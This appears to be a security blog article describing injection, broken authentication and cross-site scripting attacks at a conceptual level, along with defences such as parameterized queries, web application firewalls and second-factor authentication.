The Internet has brought great value to our lives. It lets us communicate across the globe in the blink of an eye using instant messaging. It gives us platforms, accessible from any device, anywhere, to run our lives from and has pulled human knowledge together in a way never seen before in history.
With great advances, come great problems and the basic architecture that the Internet is built on, i.e. distributed and interconnected, has opened up new channels that can be exploited by cybercriminals.
Web based attacks are now the mainstay of the cybercrime professional. I use the term professional purposely, because the days of the opportunist hacker are gone, and now organized, often state sponsored, cybercrime is what we find ourselves up against.
This article will look at just a few of the most popular web based attacks that we need to be aware of so we can form a robust and effective security strategy and to determine the most modern approaches to dealing with these sorts of threats.
Web Attack 1: The Attack of the Killer Databases
The database is a fundamental architectural component of the web. Databases store the building block of the Internet, information. This information can be anything from social security numbers to login credentials. Web databases are at risk of an attack type known as an ‘injection attack’. Veracode has identified SQL injection attacks as being some of the most prevalent type of web attack.
There are two basic types of database, a SQL and a NoSQL based system; both are at risk forinjection attacks. In attacks against a web database, the hacker will take advantage of an input field on your website’s user interface that is normally used to query a database. An example of such a field is a username or password entry field (the query occurring on clicking the submit button). Instead of entering a username or password, the hacker will enter a SQL command (or a JSON string in the case of a NoSQL database). This piece of malicious code is then sent to the database, which executes the command as if it were an expected string (like a username). Cybercriminals use injection attacks against databases to export data such as Personally Identifying Data (PII), to delete accounts, create bogus accounts and modify data. Injection attacks can even be used to initiate a Denial of Service (DOS) attack.
Ensuring a database is secured against such attacks, it very important for an organization as security and privacy breaches cost money, reputation and time. Methods and tools exist to prevent this type of attack happening. This includes making sure that only expected strings can be submitted to the database (parameter queries) or by storing the entire query in the database and ‘filling in the blanks’ (stored procedures). Tools such as Web Application Firewalls (WAF) are also an integral part of the defensive stance that can be taken against SQL injection. In 2013 two thirds of U.S. companies were breached via a SQL injection attack, according to the Ponemon Institute. The same report showed that 88% of respondents were in favor of using behavioral analysis such as WAF with analysis capabilities, to prevent attacks.
One of the most famous SQL injection attacks is that carried out by Albert Gonzalez against bank ATM machines. It resulted in 170 million credit cards being affected. More recently SAP was impacted by a SQL injection that allowed control of one of their medical apps. SQL injection is a massive headache for all companies, which have a database and a web interface.
Web Attack 2: If it Ain’t broke…
Broken authentication and session management are areas of weakness that can become a hackers dream. In fact, this type of web vulnerability has been given the position of number two in the OWASP top ten web attack type list.
Authentication can be broken in a number of ways, including:
- Brute force attacks: Poor quality authentication, such as easily guessable passwords and usernames need to be avoided. Creating a password or username policy that gives strength, but retains usability, is one of the simplest, but effective tools you can use against this kind of brute force attack.
- Interception of unencrypted traffic: This is easier than it sounds. There are legitimate devices available, that are used by penetration testers and that cost less than $100, which allow a person to intercept unencrypted traffic. Man in the Middle (MitM) attacks can easily occur where a user’s login details and their Session ID can be captured, allowing a cybercriminal to impersonate that user. SSL/TSL encryption must be used across all parts of a web application that is exposed, especially where that site collects user details.
- Poorly implemented session management: HTML is stateless and as such nothing is stored between page requests. In more complex web applications, i.e. those that require login credentials, there needs to be mechanisms to store these details between pages (so the user remains logged in across the site). Poor implementation in this area, for example creating predictable Session ID’s, can result in session hijacking with the ability to then steal user login credentials
- Phishing: Phishing and especially spear phishing is becoming the weapon of choice for cybercriminals to use to obtain login credentials. They are often used, to great effect, to steal privileged administrator access, the consequences of which we are all aware of from the numerous news articles on major data breaches in recent years. Implementing second factor authentication can mitigate this risk.
- Account recovery: Designing and building secure, yet usable, account recovery mechanisms into your web application is an area that is vital to prevent abuses of login credentials. This was exemplified by the celebrity hack of 2014. In this breach intimate photos were disclosed after cybercriminals were able to access a user’s account through a flawed credential recovery system. Designing the system to use a second layer of verification before credential reset is vital in combatting this type of exploit.
Authentication is one of the most difficult aspects of web application security to get right. It has multiple facets of implementation, including encryption of transmission, predictable login credentials and session management issues. All of these considerations can be managed with the right tools in place. For example, setting a usable password policy, adding in a second factor and ensuring that encryption is properly implemented. Deploying a reverse proxy featuring secure authentication and session management is probably the easiest and most robust solution against this type of web attack.
Web Attack 3: The Big X…SS
Cross Site Scripting or XSS is a variant on the injection attack. In this case, malicious JavaScript code is inserted to the back end web database. This time the malicious code can be inserted using anything from a blog comment post, to an ad or video. It’s a very popular method of attack as it can be used to distribute malware, hijack a users session, display illegitimate content, or even steal session cookies and users login credentials.
As more people become aware of SQL injection attacks and close off that route, cybercriminals will make more use of XSS.
The use of a WAF to prevent XSS is a good strategy, but it must be used across all domains and sub-domains to be effective, otherwise an XSS exploit will just find another route in; you cannot leave any door unlocked. The Open Web Application Security Project, OWASP has listed XSS attacks as being number three in the top ten list of web application vulnerabilities.
A new vector for such attacks is known as malvertising. Malvertising is where a cybercriminal uses an online ad or video to inject malicious code onto a users machine, by exploiting vulnerabilities in a browser or software like Adobe Flash. It is becoming an increasing problem. Google’s Double Click network was recently infected and had to purge itself of over 350 million ‘bad ads’. XSS attacks are now often combined with ‘drive by download’ where a user is automatically redirected (no user intervention needed) to a malicious site when an ad pops up that has been infected. The drive by download will use an exploit like the Angler Toolkit, which will find vulnerabilities on the user’s machine and use these to infect the PC with malware.
Keeping Control of Web Attacks
The above three types of web application security attacks, are part of a complex mix of vectors and actors, that takes advantage of software vulnerabilities, injection methods and social engineering. This list is by no means exhaustive and many types of attack methods exist and new ones will no doubt surface too. Many of the attacks on web applications require that there is some form of user interaction to initiate an attack. This can be simply utilizing the UI of a website, or sending out phishing emails that trick a user into navigating to a spoof site. The human touch points should always be acknowledged in any web based attacks.
Web application threats are something that is part of our everyday experience of owning an open Internet and one that brings multiple services together for the general good of all. But we can stifle these threats through awareness, education and the right defensive measures, such as those explored in the text above. The use of modern tools like Web Application Firewalls and properly implemented credential policies and second factor, are an intrinsic part of our defense of our open Web and can help towards a more secure environment for not just our organization, but for anyone who interacts with our services.